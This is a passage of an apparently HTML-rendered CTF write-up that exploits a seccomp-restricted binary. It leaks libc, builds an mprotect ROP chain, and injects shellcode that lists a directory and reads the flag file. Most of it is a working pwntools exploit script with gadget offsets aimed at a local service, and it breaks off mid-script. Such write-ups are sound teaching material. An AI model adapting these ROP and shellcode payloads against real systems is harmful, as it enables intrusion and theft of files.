string\">\"rsp\"</span><span class=\"token punctuation\">,</span> <span class=\"token number\">0</span><span class=\"token punctuation\">)</span>\nshellcode <span class=\"token operator\">+=</span> shellcraft<span class=\"token punctuation\">.</span>mmap<span class=\"token 
punctuation\">(</span><span class=\"token number\">0</span><span class=\"token punctuation\">,</span> <span class=\"token number\">0x1000</span><span class=\"token punctuation\">,</span> constants<span class=\"token punctuation\">.</span>PROT_READ<span class=\"token punctuation\">,</span> constants<span class=\"token punctuation\">.</span>MAP_PRIVATE<span class=\"token punctuation\">,</span> <span class=\"token string\">\"rax\"</span><span class=\"token punctuation\">,</span> <span class=\"token number\">0</span><span class=\"token punctuation\">)</span>\nshellcode <span class=\"token operator\">+=</span> shellcraft<span class=\"token punctuation\">.</span>push<span class=\"token punctuation\">(</span><span class=\"token number\">0x100</span><span class=\"token punctuation\">)</span>\nshellcode <span class=\"token operator\">+=</span> shellcraft<span class=\"token punctuation\">.</span>push<span class=\"token punctuation\">(</span><span class=\"token string\">\"rax\"</span><span class=\"token punctuation\">)</span>\nshellcode <span class=\"token operator\">+=</span> shellcraft<span class=\"token punctuation\">.</span>pwritev2<span class=\"token punctuation\">(</span><span class=\"token number\">1</span><span class=\"token punctuation\">,</span> <span class=\"token string\">\"rsp\"</span><span class=\"token punctuation\">,</span> <span class=\"token number\">1</span><span class=\"token punctuation\">,</span> <span class=\"token operator\">-</span><span class=\"token number\">1</span><span class=\"token punctuation\">,</span> <span class=\"token number\">0</span><span class=\"token punctuation\">)</span>\n\ncode<span class=\"token operator\">=</span><span class=\"token triple-quoted-string string\">\"\"\"\nlea rsi, [rip+filename]\nmov rdi, 0\nxor rdx, rdx\nmov rax, 257\nsyscall\n\n// mmap(addr=0, length=0x1000, prot=PROT_READ (1), flags=MAP_PRIVATE (2), fd='rax', offset=0)\npush 2\npop r10\nmov r8, rax\nxor r9, r9\nxor edi, edi\nmov rdx, 1\nmov rsi, 4096\npush 9\npop 
rax\nsyscall\n\n/* pwritev2(vararg_0=1, vararg_1='rsp', vararg_2=1, vararg_3=-1, vararg_4=0) */\npush 0x100\npush rax\nmov r10, -1\nxor r8, r8\nmov rdi, 1\nmov rsi, rsp\nmov rdx, rdi\nmov rax, 328\nsyscall\n\nfilename:\n    .string \"/home/user/flag.txt\"\n\"\"\"</span></code></pre></div>\n<p>Reference: <a href=\"/ctf-uiuctf-2024-en\">UIU CTF 2024</a></p>\n<h2 id=\"solution-1-output-file-data-and-retrieve-the-flag\" style=\"position:relative;\"><a href=\"#solution-1-output-file-data-and-retrieve-the-flag\" aria-label=\"solution 1 output file data and retrieve the flag permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>Solution 1: Output File Data and Retrieve the Flag</h2>\n<p>Now that I’ve organized the seccomp bypass and Shell Code knowledge, let’s finally retrieve the Flag.</p>\n<p>Since <code class=\"language-text\">execve</code> and <code class=\"language-text\">execveat</code> are blocked by seccomp, the strategy is to leak file data rather than obtaining a shell.</p>\n<p>For this challenge binary, the steps needed to get the Flag are:</p>\n<ol>\n<li>Identify the correct file name of the Flag created at <code class=\"language-text\">/app/ctf4b/flag-$(md5sum /flag.txt | awk '{print $1}').txt</code>.</li>\n<li>Read the Flag text from the file and leak it via stdout.</li>\n</ol>\n<p>Both steps can be achieved by combining the Shell Code techniques covered so far.</p>\n<p>However, running all the code as a ROP chain is quite laborious, so I’ll embed the execution code as Shell Code and use 
<code class=\"language-text\">mprotect</code> to grant execute permission.</p>\n<h3 id=\"granting-execute-permission-with-mprotect\" style=\"position:relative;\"><a href=\"#granting-execute-permission-with-mprotect\" aria-label=\"granting execute permission with mprotect permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>Granting Execute Permission with mprotect</h3>\n<p>In this challenge, we can retrieve the Flag by first using <code class=\"language-text\">getdents</code> to identify the file name containing the Flag, then using <code class=\"language-text\">read</code>/<code class=\"language-text\">write</code> to print the file contents to stdout.</p>\n<p>However, expressing such operations as a ROP chain rather than as Shell Code, and finding a gadget for every step, is relatively challenging.</p>\n<p>In such cases, using a short ROP chain only to assign execute permission to an arbitrary region and then embedding a payload there lets us run Shell Code directly instead of a long ROP chain.</p>\n<p>Since PIE is disabled in this challenge, the binary’s virtual addresses can be used directly as the write destination for the Shell Code.</p>\n<p>The <code class=\"language-text\">.data</code> section contains the seccomp filter, but overwriting it at exploit time is fine: the filter has already been installed in the kernel, so the copy in memory is no longer consulted. 
I’ll target the region containing <code class=\"language-text\">0x404060</code>.</p>\n<p>A ROP chain that uses <code class=\"language-text\">mprotect</code> to grant write and execute permission to the range <code class=\"language-text\">0x404000</code> to <code class=\"language-text\">0x405000</code> can be constructed as follows:</p>\n<div class=\"gatsby-highlight\" data-language=\"python\"><pre class=\"language-python\"><code class=\"language-python\">system_addr <span class=\"token operator\">=</span> <span class=\"token builtin\">int</span><span class=\"token punctuation\">(</span>r<span class=\"token punctuation\">.</span>decode<span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">.</span>split<span class=\"token punctuation\">(</span><span class=\"token string\">\"\\n\"</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">[</span><span class=\"token number\">0</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">.</span>split<span class=\"token punctuation\">(</span><span class=\"token string\">\"@\"</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">[</span><span class=\"token number\">1</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span><span class=\"token number\">16</span><span class=\"token punctuation\">)</span>\nlibc_baseaddress <span class=\"token operator\">=</span> system_addr <span class=\"token operator\">-</span> <span class=\"token number\">0x50d70</span>\nbinsh_addr <span class=\"token operator\">=</span> libc_baseaddress <span class=\"token operator\">+</span> <span class=\"token number\">0x1d8678</span>\nmprotect_addr <span class=\"token operator\">=</span> libc_baseaddress <span class=\"token operator\">+</span> <span class=\"token number\">0x11eaa0</span>\n\npop_rdx_r12_ret <span class=\"token operator\">=</span> libc_baseaddress <span class=\"token 
operator\">+</span> <span class=\"token number\">0x13b649</span>\npop_rdi_ret <span class=\"token operator\">=</span> libc_baseaddress <span class=\"token operator\">+</span> <span class=\"token number\">0x1bbea1</span>\npop_rsi_r15_ret <span class=\"token operator\">=</span> libc_baseaddress <span class=\"token operator\">+</span> <span class=\"token number\">0x1bbe9f</span>\nret <span class=\"token operator\">=</span> <span class=\"token number\">0x4012fc</span>\n\npayload <span class=\"token operator\">=</span> flat<span class=\"token punctuation\">(</span>\n    <span class=\"token string\">b\"A\"</span><span class=\"token operator\">*</span><span class=\"token number\">0x10</span> <span class=\"token operator\">+</span> <span class=\"token string\">b\"B\"</span><span class=\"token operator\">*</span><span class=\"token number\">8</span><span class=\"token punctuation\">,</span>\n    pop_rdx_r12_ret<span class=\"token punctuation\">,</span>\n    <span class=\"token number\">7</span><span class=\"token punctuation\">,</span>\n    <span class=\"token number\">9999</span><span class=\"token punctuation\">,</span>\n    pop_rsi_r15_ret<span class=\"token punctuation\">,</span>\n    <span class=\"token number\">0x1000</span><span class=\"token punctuation\">,</span>\n    <span class=\"token number\">9999</span><span class=\"token punctuation\">,</span>\n    pop_rdi_ret<span class=\"token punctuation\">,</span>\n    <span class=\"token number\">0x404000</span><span class=\"token punctuation\">,</span>\n    mprotect_addr\n<span class=\"token punctuation\">)</span>\ntarget<span class=\"token punctuation\">.</span>sendline<span class=\"token punctuation\">(</span>payload<span class=\"token punctuation\">)</span></code></pre></div>\n<p>This payload sets the following three registers and then calls <code class=\"language-text\">mprotect</code>:</p>\n<div class=\"gatsby-highlight\" data-language=\"nasm\"><pre class=\"language-nasm\"><code class=\"language-nasm\">mov <span 
class=\"token register variable\">rdx</span>, <span class=\"token number\">7</span> <span class=\"token comment\">; R|W|X</span>\nmov <span class=\"token register variable\">rsi</span>, <span class=\"token number\">0x1000</span> <span class=\"token comment\">; target memory size</span>\nmov <span class=\"token register variable\">rdi</span>, {target_addr}</code></pre></div>\n<p>This ROP chain grants write and execute permission to the region from <code class=\"language-text\">0x404000</code> to <code class=\"language-text\">0x405000</code>.</p>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 898px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/1ca77a324b9ce192f099940b039ee08f/84cc5/image-20240628210517901.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 30.41666666666667%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,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'); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/1ca77a324b9ce192f099940b039ee08f/8ac56/image-20240628210517901.webp 240w,\n/static/1ca77a324b9ce192f099940b039ee08f/d3be9/image-20240628210517901.webp 480w,\n/static/1ca77a324b9ce192f099940b039ee08f/005c4/image-20240628210517901.webp 898w\"\n              sizes=\"(max-width: 898px) 100vw, 898px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/1ca77a324b9ce192f099940b039ee08f/8ff5a/image-20240628210517901.png 240w,\n/static/1ca77a324b9ce192f099940b039ee08f/e85cb/image-20240628210517901.png 480w,\n/static/1ca77a324b9ce192f099940b039ee08f/84cc5/image-20240628210517901.png 898w\"\n            sizes=\"(max-width: 898px) 100vw, 
898px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/1ca77a324b9ce192f099940b039ee08f/84cc5/image-20240628210517901.png\"\n            alt=\"image-20240628210517901\"\n            title=\"image-20240628210517901\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<h3 id=\"embedding-a-payload-at-an-arbitrary-address\" style=\"position:relative;\"><a href=\"#embedding-a-payload-at-an-arbitrary-address\" aria-label=\"embedding a payload at an arbitrary address permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>Embedding a Payload at an Arbitrary Address</h3>\n<p>Now that write and execute permission has been granted to the region from <code class=\"language-text\">0x404000</code> to <code class=\"language-text\">0x405000</code>, we embed the Shell Code into this address space rather than the stack.</p>\n<p>The technique is the same as before: use <code class=\"language-text\">read</code> to redirect the destination of bytes received from stdin to an arbitrary address.</p>\n<p>To do this, append the following ROP chain to the previous payload:</p>\n<div class=\"gatsby-highlight\" data-language=\"python\"><pre class=\"language-python\"><code class=\"language-python\">payload <span class=\"token operator\">+=</span> flat<span class=\"token punctuation\">(</span>\n 
   xor_rax_ret<span class=\"token punctuation\">,</span>\n    pop_rdx_r12_ret<span class=\"token punctuation\">,</span>\n    <span class=\"token number\">0x100</span><span class=\"token punctuation\">,</span>\n    <span class=\"token number\">9999</span><span class=\"token punctuation\">,</span>\n    pop_rsi_r15_ret<span class=\"token punctuation\">,</span>\n    <span class=\"token number\">0x404060</span><span class=\"token punctuation\">,</span>\n    <span class=\"token number\">9999</span><span class=\"token punctuation\">,</span>\n    pop_rdi_ret<span class=\"token punctuation\">,</span>\n    <span class=\"token number\">0</span><span class=\"token punctuation\">,</span>\n    syscall_ret\n<span class=\"token punctuation\">)</span>\ntarget<span class=\"token punctuation\">.</span>sendline<span class=\"token punctuation\">(</span>payload<span class=\"token punctuation\">)</span>\ntarget<span class=\"token punctuation\">.</span>send<span class=\"token punctuation\">(</span><span class=\"token string\">b\"A\"</span><span class=\"token operator\">*</span><span class=\"token number\">0x100</span><span class=\"token punctuation\">)</span></code></pre></div>\n<p>This code implements the equivalent of the following Shell Code:</p>\n<div class=\"gatsby-highlight\" data-language=\"nasm\"><pre class=\"language-nasm\"><code class=\"language-nasm\">mov <span class=\"token register variable\">rdi</span>, <span class=\"token number\">0</span> <span class=\"token comment\">; fd = stdin</span>\nmov <span class=\"token register variable\">rax</span>, <span class=\"token number\">0</span> <span class=\"token comment\">; read</span>\nmov <span class=\"token register variable\">rsi</span>, <span class=\"token number\">0x404060</span> <span class=\"token comment\">; write destination</span>\nmov <span class=\"token register variable\">rdx</span>, <span class=\"token number\">0x100</span> <span class=\"token comment\">; bytes to read</span>\nsyscall</code></pre></div>\n<p>Running this 
script confirms that the data region starting at <code class=\"language-text\">0x404060</code> is filled with <code class=\"language-text\">A</code>s:</p>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 853px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/f47d5b7248e9b00dccaa62468a658664/66caf/image-20240628214614945.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 59.166666666666664%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,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'); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/f47d5b7248e9b00dccaa62468a658664/8ac56/image-20240628214614945.webp 240w,\n/static/f47d5b7248e9b00dccaa62468a658664/d3be9/image-20240628214614945.webp 480w,\n/static/f47d5b7248e9b00dccaa62468a658664/d8b1f/image-20240628214614945.webp 853w\"\n              sizes=\"(max-width: 853px) 100vw, 853px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/f47d5b7248e9b00dccaa62468a658664/8ff5a/image-20240628214614945.png 240w,\n/static/f47d5b7248e9b00dccaa62468a658664/e85cb/image-20240628214614945.png 480w,\n/static/f47d5b7248e9b00dccaa62468a658664/66caf/image-20240628214614945.png 853w\"\n            sizes=\"(max-width: 853px) 100vw, 853px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/f47d5b7248e9b00dccaa62468a658664/66caf/image-20240628214614945.png\"\n            alt=\"image-20240628214614945\"\n            title=\"image-20240628214614945\"\n            loading=\"lazy\"\n            
style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<p>The <code class=\"language-text\">jmp_rsi</code> gadget appended at the end of the chain is used to jump directly to the buffer address held in the RSI register: RSI was set to <code class=\"language-text\">0x404060</code> for the <code class=\"language-text\">read</code> call and is not clobbered by the <code class=\"language-text\">syscall</code> instruction, so it still points at the embedded Shell Code.</p>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 824px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/50c263f9773966f72aad20a8bb0d5d9c/c1c45/image-20240628215127968.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 56.666666666666664%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,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'); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/50c263f9773966f72aad20a8bb0d5d9c/8ac56/image-20240628215127968.webp 240w,\n/static/50c263f9773966f72aad20a8bb0d5d9c/d3be9/image-20240628215127968.webp 480w,\n/static/50c263f9773966f72aad20a8bb0d5d9c/5758c/image-20240628215127968.webp 824w\"\n              sizes=\"(max-width: 824px) 100vw, 824px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/50c263f9773966f72aad20a8bb0d5d9c/8ff5a/image-20240628215127968.png 240w,\n/static/50c263f9773966f72aad20a8bb0d5d9c/e85cb/image-20240628215127968.png 480w,\n/static/50c263f9773966f72aad20a8bb0d5d9c/c1c45/image-20240628215127968.png 824w\"\n            sizes=\"(max-width: 824px) 100vw, 824px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/50c263f9773966f72aad20a8bb0d5d9c/c1c45/image-20240628215127968.png\"\n            
alt=\"image-20240628215127968\"\n            title=\"image-20240628215127968\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<h3 id=\"executing-the-embedded-shell-code\" style=\"position:relative;\"><a href=\"#executing-the-embedded-shell-code\" aria-label=\"executing the embedded shell code permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>Executing the Embedded Shell Code</h3>\n<p>Based on the techniques practiced so far, I created the following Solver.</p>\n<p>Running it retrieves the Flag:</p>\n<div class=\"gatsby-highlight\" data-language=\"python\"><pre class=\"language-python\"><code class=\"language-python\"><span class=\"token keyword\">from</span> pwn <span class=\"token keyword\">import</span> <span class=\"token operator\">*</span>\n<span class=\"token keyword\">import</span> re\n\n<span class=\"token comment\"># Set context</span>\ncontext<span class=\"token punctuation\">.</span>arch <span class=\"token operator\">=</span> <span class=\"token string\">\"amd64\"</span>\ncontext<span class=\"token punctuation\">.</span>endian <span class=\"token operator\">=</span> <span class=\"token string\">\"little\"</span>\ncontext<span class=\"token punctuation\">.</span>word_size <span class=\"token operator\">=</span> <span class=\"token number\">64</span>\n\ntarget <span class=\"token operator\">=</span> remote<span class=\"token 
punctuation\">(</span><span class=\"token string\">\"localhost\"</span><span class=\"token punctuation\">,</span> <span class=\"token number\">4567</span><span class=\"token punctuation\">)</span>\n\n<span class=\"token comment\"># Exploit</span>\nr <span class=\"token operator\">=</span> target<span class=\"token punctuation\">.</span>recvuntil<span class=\"token punctuation\">(</span><span class=\"token string\">b\"Name: \"</span><span class=\"token punctuation\">)</span>\n\nsystem_addr <span class=\"token operator\">=</span> <span class=\"token builtin\">int</span><span class=\"token punctuation\">(</span>r<span class=\"token punctuation\">.</span>decode<span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">.</span>split<span class=\"token punctuation\">(</span><span class=\"token string\">\"\\n\"</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">[</span><span class=\"token number\">0</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">.</span>split<span class=\"token punctuation\">(</span><span class=\"token string\">\"@\"</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">[</span><span class=\"token number\">1</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span><span class=\"token number\">16</span><span class=\"token punctuation\">)</span>\nlibc_baseaddress <span class=\"token operator\">=</span> system_addr <span class=\"token operator\">-</span> <span class=\"token number\">0x50d70</span>\nbinsh_addr <span class=\"token operator\">=</span> libc_baseaddress <span class=\"token operator\">+</span> <span class=\"token number\">0x1d8678</span>\nmprotect_addr <span class=\"token operator\">=</span> libc_baseaddress <span class=\"token operator\">+</span> <span class=\"token number\">0x11eaa0</span>\n\npop_rdx_r12_ret <span class=\"token operator\">=</span> 
libc_baseaddress <span class=\"token operator\">+</span> <span class=\"token number\">0x13b649</span>\npop_rdi_ret <span class=\"token operator\">=</span> libc_baseaddress <span class=\"token operator\">+</span> <span class=\"token number\">0x1bbea1</span>\npop_rsi_r15_ret <span class=\"token operator\">=</span> libc_baseaddress <span class=\"token operator\">+</span> <span class=\"token number\">0x1bbe9f</span>\nxor_rax_ret <span class=\"token operator\">=</span> libc_baseaddress <span class=\"token operator\">+</span> <span class=\"token number\">0x1a46c0</span>\nsyscall_ret <span class=\"token operator\">=</span> libc_baseaddress <span class=\"token operator\">+</span> <span class=\"token number\">0x140e2b</span>\njmp_rsi <span class=\"token operator\">=</span> libc_baseaddress <span class=\"token operator\">+</span> <span class=\"token number\">0x14d1f9</span>\nret <span class=\"token operator\">=</span> <span class=\"token number\">0x4012fc</span>\n\n<span class=\"token comment\"># mprotect ROP chain</span>\npayload <span class=\"token operator\">=</span> flat<span class=\"token punctuation\">(</span>\n    <span class=\"token string\">b\"A\"</span><span class=\"token operator\">*</span><span class=\"token number\">0x10</span> <span class=\"token operator\">+</span> <span class=\"token string\">b\"B\"</span><span class=\"token operator\">*</span><span class=\"token number\">8</span><span class=\"token punctuation\">,</span>\n    ret<span class=\"token punctuation\">,</span>\n    pop_rdx_r12_ret<span class=\"token punctuation\">,</span>\n    <span class=\"token number\">7</span><span class=\"token punctuation\">,</span>\n    <span class=\"token number\">9999</span><span class=\"token punctuation\">,</span>\n    pop_rsi_r15_ret<span class=\"token punctuation\">,</span>\n    <span class=\"token number\">0x1000</span><span class=\"token punctuation\">,</span>\n    <span class=\"token number\">9999</span><span class=\"token punctuation\">,</span>\n    
pop_rdi_ret<span class=\"token punctuation\">,</span>\n    <span class=\"token number\">0x404000</span><span class=\"token punctuation\">,</span>\n    mprotect_addr\n<span class=\"token punctuation\">)</span>\n\n<span class=\"token comment\"># read ROP chain</span>\npayload <span class=\"token operator\">+=</span> flat<span class=\"token punctuation\">(</span>\n    xor_rax_ret<span class=\"token punctuation\">,</span>\n    pop_rdx_r12_ret<span class=\"token punctuation\">,</span>\n    <span class=\"token number\">0x100</span><span class=\"token punctuation\">,</span>\n    <span class=\"token number\">9999</span><span class=\"token punctuation\">,</span>\n    pop_rsi_r15_ret<span class=\"token punctuation\">,</span>\n    <span class=\"token number\">0x404060</span><span class=\"token punctuation\">,</span>\n    <span class=\"token number\">9999</span><span class=\"token punctuation\">,</span>\n    pop_rdi_ret<span class=\"token punctuation\">,</span>\n    <span class=\"token number\">0</span><span class=\"token punctuation\">,</span>\n    syscall_ret<span class=\"token punctuation\">,</span>\n    jmp_rsi\n<span class=\"token punctuation\">)</span>\ntarget<span class=\"token punctuation\">.</span>sendline<span class=\"token punctuation\">(</span>payload<span class=\"token punctuation\">)</span>\n\n<span class=\"token comment\"># execute shell code</span>\nopen_asm <span class=\"token operator\">=</span> shellcraft<span class=\"token punctuation\">.</span>linux<span class=\"token punctuation\">.</span><span class=\"token builtin\">open</span><span class=\"token punctuation\">(</span><span class=\"token string\">\"/app/ctf4b/\"</span><span class=\"token punctuation\">,</span> <span class=\"token number\">0</span><span class=\"token punctuation\">)</span>\ngetdents64_asm <span class=\"token operator\">=</span> shellcraft<span class=\"token punctuation\">.</span>linux<span class=\"token punctuation\">.</span>getdents64<span class=\"token punctuation\">(</span><span 
class=\"token string\">\"rax\"</span><span class=\"token punctuation\">,</span> <span class=\"token string\">\"rsp\"</span><span class=\"token punctuation\">,</span> <span class=\"token number\">0x100</span><span class=\"token punctuation\">)</span>\nwrite_asm <span class=\"token operator\">=</span> shellcraft<span class=\"token punctuation\">.</span>linux<span class=\"token punctuation\">.</span>write<span class=\"token punctuation\">(</span><span class=\"token number\">1</span><span class=\"token punctuation\">,</span> <span class=\"token string\">\"rsp\"</span><span class=\"token punctuation\">,</span> <span class=\"token number\">0x100</span><span class=\"token punctuation\">)</span>\n\nshellcode <span class=\"token operator\">=</span> asm<span class=\"token punctuation\">(</span><span class=\"token string-interpolation\"><span class=\"token string\">f\"\"\"\n</span><span class=\"token interpolation\"><span class=\"token punctuation\">{</span>open_asm<span class=\"token punctuation\">}</span></span><span class=\"token string\">\n</span><span class=\"token interpolation\"><span class=\"token punctuation\">{</span>getdents64_asm<span class=\"token punctuation\">}</span></span><span class=\"token string\">\n</span><span class=\"token interpolation\"><span class=\"token punctuation\">{</span>write_asm<span class=\"token punctuation\">}</span></span><span class=\"token string\">\n\"\"\"</span></span><span class=\"token punctuation\">)</span>\n\nread_asm <span class=\"token operator\">=</span> shellcraft<span class=\"token punctuation\">.</span>linux<span class=\"token punctuation\">.</span>read<span class=\"token punctuation\">(</span><span class=\"token number\">0</span><span class=\"token punctuation\">,</span> <span class=\"token number\">0x4040b9</span><span class=\"token punctuation\">,</span> <span class=\"token number\">0x100</span><span class=\"token punctuation\">)</span>\nshellcode <span class=\"token operator\">+=</span> asm<span class=\"token 
punctuation\">(</span><span class=\"token string-interpolation\"><span class=\"token string\">f\"\"\"\n</span><span class=\"token interpolation\"><span class=\"token punctuation\">{</span>read_asm<span class=\"token punctuation\">}</span></span><span class=\"token string\">\n\"\"\"</span></span><span class=\"token punctuation\">)</span>\ntarget<span class=\"token punctuation\">.</span>send<span class=\"token punctuation\">(</span>shellcode <span class=\"token operator\">+</span> <span class=\"token string\">b\"A\"</span><span class=\"token operator\">*</span><span class=\"token punctuation\">(</span><span class=\"token number\">0x100</span><span class=\"token operator\">-</span><span class=\"token builtin\">len</span><span class=\"token punctuation\">(</span>shellcode<span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span>\n\ntarget<span class=\"token punctuation\">.</span>recvline<span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span>\nr <span class=\"token operator\">=</span> target<span class=\"token punctuation\">.</span>recv<span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span>\npattern <span class=\"token operator\">=</span> re<span class=\"token punctuation\">.</span><span class=\"token builtin\">compile</span><span class=\"token punctuation\">(</span><span class=\"token string\">rb\"flag-[0-9a-z]{32}.txt\"</span><span class=\"token punctuation\">)</span>\nfile_name <span class=\"token operator\">=</span> pattern<span class=\"token punctuation\">.</span>findall<span class=\"token punctuation\">(</span>r<span class=\"token punctuation\">)</span><span class=\"token punctuation\">[</span><span class=\"token number\">0</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">.</span>decode<span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span>\n\nopen_asm <span class=\"token 
operator\">=</span> shellcraft<span class=\"token punctuation\">.</span>linux<span class=\"token punctuation\">.</span><span class=\"token builtin\">open</span><span class=\"token punctuation\">(</span><span class=\"token string-interpolation\"><span class=\"token string\">f\"/app/ctf4b/</span><span class=\"token interpolation\"><span class=\"token punctuation\">{</span>file_name<span class=\"token punctuation\">}</span></span><span class=\"token string\">\"</span></span><span class=\"token punctuation\">,</span> <span class=\"token number\">0</span><span class=\"token punctuation\">)</span>\nread_asm <span class=\"token operator\">=</span> shellcraft<span class=\"token punctuation\">.</span>linux<span class=\"token punctuation\">.</span>read<span class=\"token punctuation\">(</span><span class=\"token string\">\"rax\"</span><span class=\"token punctuation\">,</span> <span class=\"token string\">\"rsp\"</span><span class=\"token punctuation\">,</span> <span class=\"token number\">30</span><span class=\"token punctuation\">)</span>\nwrite_asm <span class=\"token operator\">=</span> shellcraft<span class=\"token punctuation\">.</span>linux<span class=\"token punctuation\">.</span>write<span class=\"token punctuation\">(</span><span class=\"token number\">1</span><span class=\"token punctuation\">,</span> <span class=\"token string\">\"rsp\"</span><span class=\"token punctuation\">,</span> <span class=\"token number\">30</span><span class=\"token punctuation\">)</span>\nshellcode <span class=\"token operator\">=</span> asm<span class=\"token punctuation\">(</span><span class=\"token string-interpolation\"><span class=\"token string\">f\"\"\"\n</span><span class=\"token interpolation\"><span class=\"token punctuation\">{</span>open_asm<span class=\"token punctuation\">}</span></span><span class=\"token string\">\n</span><span class=\"token interpolation\"><span class=\"token punctuation\">{</span>read_asm<span class=\"token 